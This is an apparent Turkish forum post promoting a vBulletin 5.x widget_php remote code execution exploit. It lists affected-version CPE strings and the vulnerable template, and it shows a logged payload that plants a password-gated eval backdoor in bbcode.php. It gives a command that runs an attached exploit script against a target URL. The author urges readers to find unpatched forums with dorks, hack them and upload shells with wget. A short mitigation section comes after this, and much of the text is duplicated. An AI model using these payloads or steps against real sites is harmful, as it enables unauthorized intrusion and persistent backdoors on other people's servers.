Security Risk: Critical
Exploitation Level: Very Easy
DREAD Score: 9.4
Vulnerability: Remote Code Execution (RCE)
Patched Version: 5.5.2, 5.5.3, and 5.5.4
Kullandığı payload
Vbulletinde kritik bir exploit olduğu ortaya çıktı, benimde haberim yoktu @Joker dün yazdı bir bak ne buldum dedi bizde baktık birlikte hakkaten ilginç bir açık vermiş vbulletin, xenforada böyle bir açık çıktığını düşünmek bile sıkıcı bir durum olurdu. Dork konusunda iyi olanlar muhtemelen daha fix olmamış birçok site bulacaktır, hatta belki büyük forumları bile hackleyebileceksiniz.
Herhangi bir linux terminalden şu komutu çalıştırın
ardından ls komutunu çalıştırın gelen ekranda, eğer sitenin dosyaları alt alta listelenmişse açık vardır ve komutlar ile shell upload edin wget vs gibi.
EXPLOIT ektedir .txt olarak iner ancak uzantısını .py yapmanız gerekir.
açığa neden olan dosya:
index.php?routestring=ajax/render/widget_php
açığa neden olan dosyadaki ilgili bölüm
Açığı nasıl kapatırım ?
Bu sorunu geçici olarak çözmek için yönetim panelinizden şuraya gidin:
Admincp >> Seçenekler >> Genel Ayarlar
Buradan, PHP'yi, Statik HTML'yi ve Reklam Modülü oluşturma ayarını devre dışı bırakın.
Vbulletin bunun için bir patch yayınladı hatalı kodlar için. Yukardaki çözüm şuanlık işinizi görür.
Exploitation Level: Very Easy
DREAD Score: 9.4
Vulnerability: Remote Code Execution (RCE)
Patched Version: 5.5.2, 5.5.3, and 5.5.4
cpe:/a:vbulletin:vbulletin:5.5.4:
cpe:/a:vbulletin:vbulletin:5.5.3:
cpe:/a:vbulletin:vbulletin:5.5.2:
cpe:/a:vbulletin:vbulletin:5.5.1:
cpe:/a:vbulletin:vbulletin:5.5.0:
cpe:/a:vbulletin:vbulletin:5.5.4:
cpe:/a:vbulletin:vbulletin:5.4.5:
cpe:/a:vbulletin:vbulletin:5.4.4:
cpe:/a:vbulletin:vbulletin:5.4.3:
cpe:/a:vbulletin:vbulletin:5.4.2:
cpe:/a:vbulletin:vbulletin:5.4.1:
cpe:/a:vbulletin:vbulletin:5.4.0:
cpe:/a:vbulletin:vbulletin:5.3.4:
cpe:/a:vbulletin:vbulletin:5.3.3:
cpe:/a:vbulletin:vbulletin:5.3.2:
cpe:/a:vbulletin:vbulletin:5.3.1:
cpe:/a:vbulletin:vbulletin:5.3.0:
cpe:/a:vbulletin:vbulletin:5.2.6:
cpe:/a:vbulletin:vbulletin:5.2.5:
cpe:/a:vbulletin:vbulletin:5.2.4:
cpe:/a:vbulletin:vbulletin:5.2.3:
cpe:/a:vbulletin:vbulletin:5.2.0_patch_level_1:
cpe:/a:vbulletin:vbulletin:5.2.0_patch_level_2:
cpe:/a:vbulletin:vbulletin:5.2.2_patch_level_1:
cpe:/a:vbulletin:vbulletin:5.2.1_patch_level_1:
cpe:/a:vbulletin:vbulletin:5.2.0_patch_level_3:
cpe:/a:vbulletin:vbulletin:5.2.2:
cpe:/a:vbulletin:vbulletin:5.2.1:
cpe:/a:vbulletin:vbulletin:5.2.0:
cpe:/a:vbulletin:vbulletin:5.1.8:
cpe:/a:vbulletin:vbulletin:5.1.7:
cpe:/a:vbulletin:vbulletin:5.1.6:
cpe:/a:vbulletin:vbulletin:5.1.5:
cpe:/a:vbulletin:vbulletin:5.1.4:
cpe:/a:vbulletin:vbulletin:5.1.3:
cpe:/a:vbulletin:vbulletin:5.1.2:
cpe:/a:vbulletin:vbulletin:5.1.1:
cpe:/a:vbulletin:vbulletin:5.1.0:
cpe:/a:vbulletin:vbulletin:5.0.5:
cpe:/a:vbulletin:vbulletin:5.0.4:
cpe:/a:vbulletin:vbulletin:5.0.3:
cpe:/a:vbulletin:vbulletin:5.0.2:
cpe:/a:vbulletin:vbulletin:5.0.1:
cpe:/a:vbulletin:vbulletin:5.0:
cpe:/a:vbulletin:vbulletin:5.5.3:
cpe:/a:vbulletin:vbulletin:5.5.2:
cpe:/a:vbulletin:vbulletin:5.5.1:
cpe:/a:vbulletin:vbulletin:5.5.0:
cpe:/a:vbulletin:vbulletin:5.5.4:
cpe:/a:vbulletin:vbulletin:5.4.5:
cpe:/a:vbulletin:vbulletin:5.4.4:
cpe:/a:vbulletin:vbulletin:5.4.3:
cpe:/a:vbulletin:vbulletin:5.4.2:
cpe:/a:vbulletin:vbulletin:5.4.1:
cpe:/a:vbulletin:vbulletin:5.4.0:
cpe:/a:vbulletin:vbulletin:5.3.4:
cpe:/a:vbulletin:vbulletin:5.3.3:
cpe:/a:vbulletin:vbulletin:5.3.2:
cpe:/a:vbulletin:vbulletin:5.3.1:
cpe:/a:vbulletin:vbulletin:5.3.0:
cpe:/a:vbulletin:vbulletin:5.2.6:
cpe:/a:vbulletin:vbulletin:5.2.5:
cpe:/a:vbulletin:vbulletin:5.2.4:
cpe:/a:vbulletin:vbulletin:5.2.3:
cpe:/a:vbulletin:vbulletin:5.2.0_patch_level_1:
cpe:/a:vbulletin:vbulletin:5.2.0_patch_level_2:
cpe:/a:vbulletin:vbulletin:5.2.2_patch_level_1:
cpe:/a:vbulletin:vbulletin:5.2.1_patch_level_1:
cpe:/a:vbulletin:vbulletin:5.2.0_patch_level_3:
cpe:/a:vbulletin:vbulletin:5.2.2:
cpe:/a:vbulletin:vbulletin:5.2.1:
cpe:/a:vbulletin:vbulletin:5.2.0:
cpe:/a:vbulletin:vbulletin:5.1.8:
cpe:/a:vbulletin:vbulletin:5.1.7:
cpe:/a:vbulletin:vbulletin:5.1.6:
cpe:/a:vbulletin:vbulletin:5.1.5:
cpe:/a:vbulletin:vbulletin:5.1.4:
cpe:/a:vbulletin:vbulletin:5.1.3:
cpe:/a:vbulletin:vbulletin:5.1.2:
cpe:/a:vbulletin:vbulletin:5.1.1:
cpe:/a:vbulletin:vbulletin:5.1.0:
cpe:/a:vbulletin:vbulletin:5.0.5:
cpe:/a:vbulletin:vbulletin:5.0.4:
cpe:/a:vbulletin:vbulletin:5.0.3:
cpe:/a:vbulletin:vbulletin:5.0.2:
cpe:/a:vbulletin:vbulletin:5.0.1:
cpe:/a:vbulletin:vbulletin:5.0:
Kullandığı payload
Kod:
202.141.232.162 - widgetConfig%5Bcode%5D=echo+shell_exec%28%27sed+-i+%5C%27s%2Feval%28%5C%24code%29%3B%2Fif+%28isset%28%5C%24_REQUEST%5B%5C%22epass%5C%22%5D%29+%5C%26%5C%26+%5C%24_REQUEST%5B%5C%22epass%5C%22%5D+%3D%3D+%5C%222dmfrb28nu3c6s9j%5C%22%29+%7B+eval%28%5C%24code%29%3B+%7D%2Fg%5C%27+includes%2Fvb5%2Ffrontend%2Fcontroller%2Fbbcode.php+%26%26+echo+-n+exploited+%7C+md5sum%27%29%3B+exit%3B [25/Sep/2019:18:01:16 +0000] "POST /index.php?routestring=ajax/render/widget_php HTTP/1.1" 200 5407 "-"
Vbulletinde kritik bir exploit olduğu ortaya çıktı, benimde haberim yoktu @Joker dün yazdı bir bak ne buldum dedi bizde baktık birlikte hakkaten ilginç bir açık vermiş vbulletin, xenforada böyle bir açık çıktığını düşünmek bile sıkıcı bir durum olurdu. Dork konusunda iyi olanlar muhtemelen daha fix olmamış birçok site bulacaktır, hatta belki büyük forumları bile hackleyebileceksiniz.
Herhangi bir linux terminalden şu komutu çalıştırın
Python:
python vb.py http://hedefsite.com/forum
ardından ls komutunu çalıştırın gelen ekranda, eğer sitenin dosyaları alt alta listelenmişse açık vardır ve komutlar ile shell upload edin wget vs gibi.
EXPLOIT ektedir .txt olarak iner ancak uzantısını .py yapmanız gerekir.
açığa neden olan dosya:
index.php?routestring=ajax/render/widget_php
açığa neden olan dosyadaki ilgili bölüm
HTML:
<div class="widget-content">
<vb:if condition="!empty($widgetConfig['code']) AND
!$vboptions['disable_php_rendering']">
{vb:action evaledPHP, bbcode, evalCode, {vb:raw widgetConfig.code}}
{vb:raw $evaledPHP}
<vb:else />
<vb:if condition="$user['can_use_sitebuilder']">
<span class="note">{vb:phrase click_edit_to_config_module}</span>
</vb:if>
</vb:if>
</div>
Açığı nasıl kapatırım ?
Bu sorunu geçici olarak çözmek için yönetim panelinizden şuraya gidin:
Admincp >> Seçenekler >> Genel Ayarlar
Buradan, PHP'yi, Statik HTML'yi ve Reklam Modülü oluşturma ayarını devre dışı bırakın.
Vbulletin bunun için bir patch yayınladı hatalı kodlar için. Yukardaki çözüm şuanlık işinizi görür.
Ekli dosyalar
Son düzenleme: